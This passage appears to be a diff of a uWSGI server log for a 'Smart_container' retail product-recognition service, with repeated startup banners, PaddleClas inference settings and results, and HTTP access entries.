rebuild with pcre support !!! -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! 
(use the --uid flag) *** -chdir() to /root/Smart_container -your processes number limit is 7720 -your memory page size is 4096 bytes -detected max file descriptor number: 65535 -lock engine: pthread robust mutexes -thunder lock: disabled (you can enable it with --thunder-lock) -uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 6 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -Python version: 3.8.10 (default, Sep 28 2021, 16:10:42) [GCC 9.3.0] -*** Python threads support is disabled. You can enable it with --enable-threads *** -Python main interpreter initialized at 0x5607aadfccd0 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -your server socket listen backlog is limited to 100 connections -your mercy for graceful operations on workers is 60 seconds -mapped 802120 bytes (783 KB) for 10 cores -*** Operational MODE: preforking *** -WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x5607aadfccd0 pid: 15921 (default app) -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! 
(use the --uid flag) *** -*** uWSGI is running in multiple interpreter mode *** -spawned uWSGI master process (pid: 15921) -spawned uWSGI worker 1 (pid: 15923, cores: 1) -spawned uWSGI worker 2 (pid: 15924, cores: 1) -spawned uWSGI worker 3 (pid: 15925, cores: 1) -spawned uWSGI worker 4 (pid: 15926, cores: 1) -spawned uWSGI worker 5 (pid: 15928, cores: 1) -spawned uWSGI worker 6 (pid: 15929, cores: 1) -spawned uWSGI worker 7 (pid: 15930, cores: 1) -spawned uWSGI worker 8 (pid: 15931, cores: 1) -spawned uWSGI worker 9 (pid: 15932, cores: 1) -spawned uWSGI worker 10 (pid: 15933, cores: 1) -*** Starting uWSGI 2.0.20 (64bit) on [Tue Nov 2 12:53:32 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas -machine: x86_64 -clock source: unix -detected number of CPU cores: 1 -current working directory: /root/Smart_container/conf/uwsgi -detected binary path: /usr/local/bin/uwsgi -!!! no internal routing support, rebuild with pcre support !!! -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -chdir() to /root/Smart_container -your processes number limit is 7720 -your memory page size is 4096 bytes -detected max file descriptor number: 65535 -lock engine: pthread robust mutexes -thunder lock: disabled (you can enable it with --thunder-lock) -uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 6 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -Python version: 3.8.10 (default, Sep 28 2021, 16:10:42) [GCC 9.3.0] -*** Python threads support is disabled. You can enable it with --enable-threads *** -Python main interpreter initialized at 0x563825142cd0 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! 
(use the --uid flag) *** -your server socket listen backlog is limited to 100 connections -your mercy for graceful operations on workers is 60 seconds -mapped 802120 bytes (783 KB) for 10 cores -*** Operational MODE: preforking *** -WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x563825142cd0 pid: 16496 (default app) -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -*** uWSGI is running in multiple interpreter mode *** -spawned uWSGI master process (pid: 16496) -spawned uWSGI worker 1 (pid: 16498, cores: 1) -spawned uWSGI worker 2 (pid: 16499, cores: 1) -spawned uWSGI worker 3 (pid: 16500, cores: 1) -spawned uWSGI worker 4 (pid: 16501, cores: 1) -spawned uWSGI worker 5 (pid: 16502, cores: 1) -spawned uWSGI worker 6 (pid: 16503, cores: 1) -spawned uWSGI worker 7 (pid: 16504, cores: 1) -spawned uWSGI worker 8 (pid: 16505, cores: 1) -spawned uWSGI worker 9 (pid: 16506, cores: 1) -spawned uWSGI worker 10 (pid: 16507, cores: 1) -*** Starting uWSGI 2.0.20 (64bit) on [Tue Nov 2 15:19:13 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas -machine: x86_64 -clock source: unix -detected number of CPU cores: 1 -current working directory: /root/Smart_container/conf/uwsgi -detected binary path: /usr/local/bin/uwsgi -!!! no internal routing support, rebuild with pcre support !!! -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -chdir() to /root/Smart_container -your processes number limit is 7720 -your memory page size is 4096 bytes -detected max file descriptor number: 65535 -lock engine: pthread robust mutexes -thunder lock: disabled (you can enable it with --thunder-lock) -probably another instance of uWSGI is running on the same address (127.0.0.1:8000). 
-bind(): Address already in use [core/socket.c line 769] -*** Starting uWSGI 2.0.20 (64bit) on [Tue Nov 2 15:35:28 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas -machine: x86_64 -clock source: unix -detected number of CPU cores: 1 -current working directory: /root/Smart_container/conf/uwsgi -detected binary path: /usr/local/bin/uwsgi -!!! no internal routing support, rebuild with pcre support !!! -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -chdir() to /root/Smart_container -your processes number limit is 7720 -your memory page size is 4096 bytes -detected max file descriptor number: 65535 -lock engine: pthread robust mutexes -thunder lock: disabled (you can enable it with --thunder-lock) -uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 6 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -Python version: 3.8.10 (default, Sep 28 2021, 16:10:42) [GCC 9.3.0] -*** Python threads support is disabled. You can enable it with --enable-threads *** -Python main interpreter initialized at 0x5590b28b4d00 -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -your server socket listen backlog is limited to 100 connections -your mercy for graceful operations on workers is 60 seconds -mapped 802120 bytes (783 KB) for 10 cores -*** Operational MODE: preforking *** -WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x5590b28b4d00 pid: 18275 (default app) -uWSGI running as root, you can use --uid/--gid/--chroot options -*** WARNING: you are running uWSGI as root !!! 
(use the --uid flag) *** -*** uWSGI is running in multiple interpreter mode *** -spawned uWSGI master process (pid: 18275) -spawned uWSGI worker 1 (pid: 18277, cores: 1) -spawned uWSGI worker 2 (pid: 18278, cores: 1) -spawned uWSGI worker 3 (pid: 18279, cores: 1) -spawned uWSGI worker 4 (pid: 18280, cores: 1) -spawned uWSGI worker 5 (pid: 18281, cores: 1) -spawned uWSGI worker 6 (pid: 18282, cores: 1) -spawned uWSGI worker 7 (pid: 18283, cores: 1) -spawned uWSGI worker 8 (pid: 18284, cores: 1) -spawned uWSGI worker 9 (pid: 18285, cores: 1) -spawned uWSGI worker 10 (pid: 18286, cores: 1) -2021-11-02 07:45:22 INFO: -=========================================================== -== PaddleClas is powered by PaddlePaddle ! == -=========================================================== -== == -== For more info please go to the following website. == -== == -== https://github.com/PaddlePaddle/PaddleClas == -=========================================================== - -2021-11-02 07:45:22 INFO: Global : -2021-11-02 07:45:23 INFO: batch_size : 32 -2021-11-02 07:45:23 INFO: cpu_num_threads : 10 -2021-11-02 07:45:23 INFO: enable_benchmark : True -2021-11-02 07:45:23 INFO: enable_mkldnn : True -2021-11-02 07:45:23 INFO: enable_profile : False -2021-11-02 07:45:23 INFO: gpu_mem : 8000 -2021-11-02 07:45:23 INFO: ir_optim : True -2021-11-02 07:45:23 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-02 07:45:23 INFO: use_fp16 : False -2021-11-02 07:45:23 INFO: use_gpu : True -2021-11-02 07:45:23 INFO: use_tensorrt : False -2021-11-02 07:45:23 INFO: IndexProcess : -2021-11-02 07:45:23 INFO: data_file : /root/Smart_container/PaddleClas/dataset/retail/data_update.txt -2021-11-02 07:45:23 INFO: delimiter : -2021-11-02 07:45:23 INFO: dist_type : IP -2021-11-02 07:45:23 INFO: embedding_size : 512 -2021-11-02 07:45:23 INFO: image_root : /root/Smart_container/PaddleClas/dataset/retail -2021-11-02 07:45:23 INFO: 
index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-02 07:45:23 INFO: index_method : HNSW32 -2021-11-02 07:45:23 INFO: index_operation : new -2021-11-02 07:45:23 INFO: RecPostProcess : None -2021-11-02 07:45:23 INFO: RecPreProcess : -2021-11-02 07:45:23 INFO: transform_ops : -2021-11-02 07:45:23 INFO: ResizeImage : -2021-11-02 07:45:23 INFO: size : 224 -2021-11-02 07:45:23 INFO: NormalizeImage : -2021-11-02 07:45:23 INFO: mean : [0.485, 0.456, 0.406] -2021-11-02 07:45:23 INFO: order : -2021-11-02 07:45:23 INFO: scale : 0.00392157 -2021-11-02 07:45:23 INFO: std : [0.229, 0.224, 0.225] -2021-11-02 07:45:23 INFO: ToCHWImage : None -E1102 07:45:23.001497 18705 analysis_config.cc:81] Please compile with gpu to EnableGpu() ---- Fused 0 subgraphs into layer_norm op. - 0%| | 0/357 [00:00 generated 18 bytes in 315 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) -[pid: 29932|app: 0|req: 1/2] 210.51.42.187 () {36 vars in 631 bytes} [Tue Nov 2 23:41:26 2021] GET /favicon.ico => generated 179 bytes in 244 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 29932|app: 0|req: 2/3] 106.12.223.201 () {36 vars in 488 bytes} [Tue Nov 2 23:47:36 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 29931|app: 0|req: 1/4] 106.12.223.201 () {36 vars in 488 bytes} [Tue Nov 2 23:47:36 2021] GET / => generated 179 bytes in 266 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 29932|app: 0|req: 3/5] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 00:03:59 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 29931|app: 0|req: 2/6] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 00:04:13 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 29932|app: 0|req: 4/7] 106.12.223.204 () {36 vars in 488 bytes} [Wed Nov 3 
00:14:13 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 29931|app: 0|req: 3/8] 106.12.223.202 () {36 vars in 488 bytes} [Wed Nov 3 00:14:15 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 29932|app: 0|req: 5/9] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 00:27:07 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 29931|app: 0|req: 4/10] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 00:27:09 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 29932|app: 0|req: 6/11] 106.12.223.200 () {36 vars in 488 bytes} [Wed Nov 3 00:40:27 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 29931|app: 0|req: 5/12] 106.12.223.203 () {36 vars in 488 bytes} [Wed Nov 3 00:40:29 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 29932|app: 0|req: 7/13] 106.12.223.202 () {36 vars in 488 bytes} [Wed Nov 3 00:52:25 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 29931|app: 0|req: 6/14] 106.12.223.202 () {36 vars in 488 bytes} [Wed Nov 3 00:52:26 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -*** Starting uWSGI 2.0.20 (64bit) on [Wed Nov 3 09:00:29 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas +spawned uWSGI master process (pid: 9015) +spawned uWSGI worker 1 (pid: 9017, cores: 1) +spawned uWSGI worker 2 (pid: 9018, cores: 1) +spawned uWSGI worker 3 (pid: 9019, cores: 1) +spawned uWSGI worker 4 (pid: 9020, cores: 1) +spawned uWSGI worker 5 (pid: 9021, cores: 1) 
+spawned uWSGI worker 6 (pid: 9022, cores: 1) +spawned uWSGI worker 7 (pid: 9023, cores: 1) +spawned uWSGI worker 8 (pid: 9024, cores: 1) +spawned uWSGI worker 9 (pid: 9025, cores: 1) +spawned uWSGI worker 10 (pid: 9026, cores: 1) +spawned uWSGI http 1 (pid: 9027) +*** Starting uWSGI 2.0.20 (64bit) on [Wed Jan 26 19:54:22 2022] *** +compiled with version: 7.5.0 on 26 January 2022 07:48:28 +os: Linux-4.15.0-166-generic #174-Ubuntu SMP Wed Dec 8 19:07:44 UTC 2021 +nodename: iZuf6i5vgnr6fuc47aapjkZ machine: x86_64 clock source: unix -detected number of CPU cores: 1 +detected number of CPU cores: 2 current working directory: /root/Smart_container/conf/uwsgi +writing pidfile to /root/Smart_container/conf/uwsgi/uwsgi.pid detected binary path: /usr/local/bin/uwsgi !!! no internal routing support, rebuild with pcre support !!! uWSGI running as root, you can use --uid/--gid/--chroot options *** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** chdir() to /root/Smart_container -your processes number limit is 7720 +your processes number limit is 15592 your memory page size is 4096 bytes detected max file descriptor number: 65535 lock engine: pthread robust mutexes thunder lock: disabled (you can enable it with --thunder-lock) -probably another instance of uWSGI is running on the same address (:8001). +uWSGI http bound on :8001 fd 6 +uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 9 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +Python version: 3.6.9 (default, Dec 8 2021, 21:08:43) [GCC 8.4.0] +*** Python threads support is disabled. You can enable it with --enable-threads *** +Python main interpreter initialized at 0x55e85a7ea830 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! 
(use the --uid flag) *** +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 801944 bytes (783 KB) for 10 cores +*** Operational MODE: preforking *** +WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x55e85a7ea830 pid: 9105 (default app) +mountpoint already configured. skip. +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 9105) +spawned uWSGI worker 1 (pid: 9107, cores: 1) +spawned uWSGI worker 2 (pid: 9108, cores: 1) +spawned uWSGI worker 3 (pid: 9109, cores: 1) +spawned uWSGI worker 4 (pid: 9110, cores: 1) +spawned uWSGI worker 5 (pid: 9111, cores: 1) +spawned uWSGI worker 6 (pid: 9112, cores: 1) +spawned uWSGI worker 7 (pid: 9113, cores: 1) +spawned uWSGI worker 8 (pid: 9114, cores: 1) +spawned uWSGI worker 9 (pid: 9115, cores: 1) +spawned uWSGI worker 10 (pid: 9116, cores: 1) +spawned uWSGI http 1 (pid: 9117) +*** Starting uWSGI 2.0.20 (64bit) on [Wed Jan 26 20:17:57 2022] *** +compiled with version: 7.5.0 on 26 January 2022 07:48:28 +os: Linux-4.15.0-166-generic #174-Ubuntu SMP Wed Dec 8 19:07:44 UTC 2021 +nodename: iZuf6i5vgnr6fuc47aapjkZ +machine: x86_64 +clock source: unix +detected number of CPU cores: 2 +current working directory: /root/Smart_container/conf/uwsgi +writing pidfile to /root/Smart_container/conf/uwsgi/uwsgi.pid +detected binary path: /usr/local/bin/uwsgi +!!! no internal routing support, rebuild with pcre support !!! +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! 
(use the --uid flag) *** +chdir() to /root/Smart_container +your processes number limit is 15592 +your memory page size is 4096 bytes +detected max file descriptor number: 65535 +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on :8001 fd 6 +uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 9 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +Python version: 3.6.9 (default, Dec 8 2021, 21:08:43) [GCC 8.4.0] +*** Python threads support is disabled. You can enable it with --enable-threads *** +Python main interpreter initialized at 0x55f413e9e7d0 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 801944 bytes (783 KB) for 10 cores +*** Operational MODE: preforking *** +WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x55f413e9e7d0 pid: 9266 (default app) +mountpoint already configured. skip. +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! 
(use the --uid flag) *** +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 9266) +spawned uWSGI worker 1 (pid: 9268, cores: 1) +spawned uWSGI worker 2 (pid: 9269, cores: 1) +spawned uWSGI worker 3 (pid: 9270, cores: 1) +spawned uWSGI worker 4 (pid: 9271, cores: 1) +spawned uWSGI worker 5 (pid: 9272, cores: 1) +spawned uWSGI worker 6 (pid: 9273, cores: 1) +spawned uWSGI worker 7 (pid: 9274, cores: 1) +spawned uWSGI worker 8 (pid: 9275, cores: 1) +spawned uWSGI worker 9 (pid: 9276, cores: 1) +spawned uWSGI worker 10 (pid: 9277, cores: 1) +spawned uWSGI http 1 (pid: 9278) +*** Starting uWSGI 2.0.20 (64bit) on [Wed Jan 26 20:28:00 2022] *** +compiled with version: 7.5.0 on 26 January 2022 07:48:28 +os: Linux-4.15.0-166-generic #174-Ubuntu SMP Wed Dec 8 19:07:44 UTC 2021 +nodename: iZuf6i5vgnr6fuc47aapjkZ +machine: x86_64 +clock source: unix +detected number of CPU cores: 2 +current working directory: /root/Smart_container/conf/uwsgi +writing pidfile to /root/Smart_container/conf/uwsgi/uwsgi.pid +detected binary path: /usr/local/bin/uwsgi +!!! no internal routing support, rebuild with pcre support !!! +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +chdir() to /root/Smart_container +your processes number limit is 15592 +your memory page size is 4096 bytes +detected max file descriptor number: 65535 +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on :8001 fd 6 +probably another instance of uWSGI is running on the same address (127.0.0.1:8000). 
bind(): Address already in use [core/socket.c line 769] -[pid: 29932|app: 0|req: 8/15] 210.51.42.187 () {38 vars in 711 bytes} [Wed Nov 3 01:00:37 2021] GET /record/ => generated 18 bytes in 1 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) -*** Starting uWSGI 2.0.20 (64bit) on [Wed Nov 3 09:16:45 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas +*** Starting uWSGI 2.0.20 (64bit) on [Wed Jan 26 20:37:08 2022] *** +compiled with version: 7.5.0 on 26 January 2022 07:48:28 +os: Linux-4.15.0-166-generic #174-Ubuntu SMP Wed Dec 8 19:07:44 UTC 2021 +nodename: iZuf6i5vgnr6fuc47aapjkZ machine: x86_64 clock source: unix -detected number of CPU cores: 1 +detected number of CPU cores: 2 current working directory: /root/Smart_container/conf/uwsgi +writing pidfile to /root/Smart_container/conf/uwsgi/uwsgi.pid detected binary path: /usr/local/bin/uwsgi !!! no internal routing support, rebuild with pcre support !!! uWSGI running as root, you can use --uid/--gid/--chroot options *** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** chdir() to /root/Smart_container -your processes number limit is 7720 +your processes number limit is 15592 +your memory page size is 4096 bytes +detected max file descriptor number: 65535 +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on :8001 fd 6 +probably another instance of uWSGI is running on the same address (127.0.0.1:8000). 
+bind(): Address already in use [core/socket.c line 769] +*** Starting uWSGI 2.0.20 (64bit) on [Wed Jan 26 20:41:16 2022] *** +compiled with version: 7.5.0 on 26 January 2022 07:48:28 +os: Linux-4.15.0-166-generic #174-Ubuntu SMP Wed Dec 8 19:07:44 UTC 2021 +nodename: iZuf6i5vgnr6fuc47aapjkZ +machine: x86_64 +clock source: unix +detected number of CPU cores: 2 +current working directory: /root/Smart_container/conf/uwsgi +writing pidfile to /root/Smart_container/conf/uwsgi/uwsgi.pid +detected binary path: /usr/local/bin/uwsgi +!!! no internal routing support, rebuild with pcre support !!! +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +chdir() to /root/Smart_container +your processes number limit is 15592 your memory page size is 4096 bytes detected max file descriptor number: 65535 lock engine: pthread robust mutexes @@ -1230,210 +664,47 @@ uWSGI http bound on :8001 fd 6 uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 9 uWSGI running as root, you can use --uid/--gid/--chroot options *** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** -Python version: 3.8.10 (default, Sep 28 2021, 16:10:42) [GCC 9.3.0] +Python version: 3.6.9 (default, Dec 8 2021, 21:08:43) [GCC 8.4.0] *** Python threads support is disabled. You can enable it with --enable-threads *** -Python main interpreter initialized at 0x563348753d30 +Python main interpreter initialized at 0x55be781517e0 uWSGI running as root, you can use --uid/--gid/--chroot options *** WARNING: you are running uWSGI as root !!! 
(use the --uid flag) *** your server socket listen backlog is limited to 100 connections your mercy for graceful operations on workers is 60 seconds -mapped 802120 bytes (783 KB) for 10 cores +mapped 801944 bytes (783 KB) for 10 cores *** Operational MODE: preforking *** -WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x563348753d30 pid: 30815 (default app) +WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x55be781517e0 pid: 10115 (default app) +mountpoint already configured. skip. uWSGI running as root, you can use --uid/--gid/--chroot options *** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** *** uWSGI is running in multiple interpreter mode *** -spawned uWSGI master process (pid: 30815) -spawned uWSGI worker 1 (pid: 30817, cores: 1) -spawned uWSGI worker 2 (pid: 30818, cores: 1) -spawned uWSGI worker 3 (pid: 30819, cores: 1) -spawned uWSGI worker 4 (pid: 30820, cores: 1) -spawned uWSGI worker 5 (pid: 30821, cores: 1) -spawned uWSGI worker 6 (pid: 30823, cores: 1) -spawned uWSGI worker 7 (pid: 30824, cores: 1) -spawned uWSGI worker 8 (pid: 30825, cores: 1) -spawned uWSGI worker 9 (pid: 30826, cores: 1) -spawned uWSGI worker 10 (pid: 30827, cores: 1) -spawned uWSGI http 1 (pid: 30828) -req -2021-11-03 01:17:51 INFO: -=========================================================== -== PaddleClas is powered by PaddlePaddle ! == -=========================================================== -== == -== For more info please go to the following website. 
== -== == -== https://github.com/PaddlePaddle/PaddleClas == -=========================================================== - -2021-11-03 01:17:51 INFO: DetPostProcess : -2021-11-03 01:17:51 INFO: DetPreProcess : -2021-11-03 01:17:51 INFO: transform_ops : -2021-11-03 01:17:51 INFO: DetResize : -2021-11-03 01:17:51 INFO: interp : 2 -2021-11-03 01:17:51 INFO: keep_ratio : False -2021-11-03 01:17:51 INFO: target_size : [640, 640] -2021-11-03 01:17:51 INFO: DetNormalizeImage : -2021-11-03 01:17:51 INFO: is_scale : True -2021-11-03 01:17:51 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 01:17:51 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 01:17:51 INFO: DetPermute : -2021-11-03 01:17:51 INFO: Global : -2021-11-03 01:17:51 INFO: batch_size : 1 -2021-11-03 01:17:51 INFO: cpu_num_threads : 10 -2021-11-03 01:17:51 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 01:17:51 INFO: enable_benchmark : True -2021-11-03 01:17:51 INFO: enable_mkldnn : True -2021-11-03 01:17:51 INFO: enable_profile : False -2021-11-03 01:17:51 INFO: gpu_mem : 8000 -2021-11-03 01:17:51 INFO: image_shape : [3, 640, 640] -2021-11-03 01:17:51 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 01:17:51 INFO: ir_optim : True -2021-11-03 01:17:51 INFO: labe_list : ['foreground'] -2021-11-03 01:17:51 INFO: max_det_results : 5 -2021-11-03 01:17:51 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 01:17:51 INFO: rec_nms_thresold : 0.05 -2021-11-03 01:17:51 INFO: threshold : 0.2 -2021-11-03 01:17:51 INFO: use_fp16 : False -2021-11-03 01:17:51 INFO: use_gpu : False -2021-11-03 01:17:51 INFO: use_tensorrt : False -2021-11-03 01:17:51 INFO: IndexProcess : -2021-11-03 01:17:51 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 01:17:51 INFO: return_k : 5 -2021-11-03 
01:17:51 INFO: score_thres : 0.5 -2021-11-03 01:17:51 INFO: RecPostProcess : None -2021-11-03 01:17:51 INFO: RecPreProcess : -2021-11-03 01:17:51 INFO: transform_ops : -2021-11-03 01:17:51 INFO: ResizeImage : -2021-11-03 01:17:51 INFO: size : 224 -2021-11-03 01:17:51 INFO: NormalizeImage : -2021-11-03 01:17:51 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 01:17:51 INFO: order : -2021-11-03 01:17:51 INFO: scale : 0.00392157 -2021-11-03 01:17:51 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 01:17:51 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. 
---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2372.8153705596924 ms per batch image -[{'bbox': [181, 133, 359, 358], 'rec_docs': '江小白', 'rec_scores': 0.60788506}] -{'bbox': [181, 133, 359, 358], 'rec_docs': '江小白', 'rec_scores': 0.60788506} -234 -["{'bbox': [181, 133, 359, 358], 'rec_docs': '江小白', 'rec_scores': 0.60788506}\n"] -['江小白'] -['江小白', '33'] -[pid: 30826|app: 0|req: 1/1] 210.51.42.176 () {34 vars in 432 bytes} [Wed Nov 3 01:17:50 2021] POST /reference_client/ => generated 114 bytes in 6537 msecs (HTTP/1.1 200) 5 headers in 158 bytes (1 switches on core 0) -[pid: 30827|app: 0|req: 1/2] 210.51.42.187 () {36 vars in 680 bytes} [Wed Nov 3 01:18:31 2021] GET /record/ => generated 18 bytes in 252 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) -req -2021-11-03 01:18:58 INFO: -=========================================================== -== PaddleClas is powered by PaddlePaddle ! == -=========================================================== -== == -== For more info please go to the following website. 
== -== == -== https://github.com/PaddlePaddle/PaddleClas == -=========================================================== - -2021-11-03 01:18:58 INFO: DetPostProcess : -2021-11-03 01:18:58 INFO: DetPreProcess : -2021-11-03 01:18:58 INFO: transform_ops : -2021-11-03 01:18:58 INFO: DetResize : -2021-11-03 01:18:58 INFO: interp : 2 -2021-11-03 01:18:58 INFO: keep_ratio : False -2021-11-03 01:18:58 INFO: target_size : [640, 640] -2021-11-03 01:18:58 INFO: DetNormalizeImage : -2021-11-03 01:18:58 INFO: is_scale : True -2021-11-03 01:18:58 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 01:18:58 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 01:18:58 INFO: DetPermute : -2021-11-03 01:18:58 INFO: Global : -2021-11-03 01:18:58 INFO: batch_size : 1 -2021-11-03 01:18:58 INFO: cpu_num_threads : 10 -2021-11-03 01:18:58 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 01:18:58 INFO: enable_benchmark : True -2021-11-03 